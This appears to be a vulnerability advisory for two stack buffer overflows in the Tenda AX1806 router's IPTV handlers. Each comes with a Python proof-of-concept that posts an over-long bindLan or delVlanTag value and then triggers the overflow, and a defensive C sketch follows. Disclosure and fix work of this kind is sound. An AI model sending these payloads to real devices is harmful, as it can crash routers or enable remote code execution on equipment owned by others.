Information

Vulns

For how variables are set through the SetValue function, see this link:

https://detailed-stetson-767.notion.site/Tenda-AX1806-Buffer-Overflow-in-formSetIptv-cebf9202122a4582ae86c5253b3f6da3?pvs=4

iptv.stb.port

Detail

Tenda AX1806 v1.0.0.1 contains a stack overflow via the iptv.stb.port parameter in the function setIptvInfo.

The value is read from cfm with GetValue and written with SetValue using data from the POST parameter bindLan. On the first request, formSetIptv calls SetValue with a string longer than v16 (64). On the second request, getIptvInfo uses GetValue to copy that string into the local variable v16. This causes a buffer overflow and may even allow a remote attacker to execute arbitrary code.

POC

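import requests

# First request: store an over-long bindLan value through SetValue
url = "http://192.168.188.157/goform/SetIPTVCfg"
payload = "a"*1000
data = {"bindLan": payload}
response = requests.post(url, data=data)

# Second request: the handler reads the stored value back with GetValue
url = "http://192.168.188.157/goform/getIptvInfo"
response = requests.post(url, data=data)
print(response.text)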

iptv.stb.mode

Detail

Tenda AX1806 v1.0.0.1 contains a stack overflow via the iptv.stb.mode parameter in the function setIptvInfo.

The value is read from cfm with GetValue and written with SetValue using data from the POST parameter delVlanTag. On the first request, formSetIptv calls SetValue with a string longer than v17 (64). On the second request, setIptvInfo uses GetValue to copy that string into the local variable v17. This causes a buffer overflow and may even allow a remote attacker to execute arbitrary code.

POC

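import requests

# First request: store an over-long delVlanTag value through SetValue
url = "http://192.168.188.157/goform/SetIPTVCfg"
payload = "a"*1000

data = {"delVlanTag": payload}
response = requests.post(url, data=data)

# Second request: the handler reads the stored value back with GetValue
url = "http://192.168.188.157/goform/getIptvInfo"
response = requests.post(url, data=data)
print(response.text)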
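
Both issues above share one pattern: a value is stored without a length check and later copied into a 64-sized local. The following C sketch is an added example, not code from the Tenda firmware, showing a length check on both the write and the read side; `cfm_value`, `set_value_checked`, `get_value_bounded` and `read_iptv_setting` are hypothetical stand-ins for cfm, SetValue, GetValue and the handler.

```c
#include <stddef.h>
#include <string.h>

#define IPTV_BUF 64              /* size the page gives for v16 / v17 (bytes assumed) */
static char cfm_value[2048];     /* constructed stand-in for one cfm entry */

/* Length of s, inspecting no more than max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Write side: persist a POST value only if every reader buffer can hold it. */
int set_value_checked(const char *post_val)
{
    size_t n = bounded_len(post_val, IPTV_BUF);
    if (n >= IPTV_BUF)
        return -1;                       /* too long: leave the store untouched */
    memcpy(cfm_value, post_val, n);
    cfm_value[n] = '\0';
    return 0;
}

/* Read side: do not trust the stored length; fail closed if it does not fit. */
int get_value_bounded(char *dst, size_t dstlen)
{
    size_t n = bounded_len(cfm_value, sizeof cfm_value);
    if (dstlen == 0 || n >= dstlen) {
        if (dstlen) dst[0] = '\0';
        return -1;
    }
    memcpy(dst, cfm_value, n);
    dst[n] = '\0';
    return 0;
}

/* Handler shape described on the page: a 64-sized local filled from the store. */
int read_iptv_setting(void)
{
    char v16[IPTV_BUF];
    if (get_value_bounded(v16, sizeof v16) != 0)
        return -1;                       /* oversized entry rejected, no copy made */
    return (int)strlen(v16);
}

int main(void) { return set_value_checked("1") == 0 && read_iptv_setting() == 1 ? 0 : 1; }
```

The read-side check matters even with the write-side check in place, because entries stored before a fix (or by another code path) may already exceed the buffer.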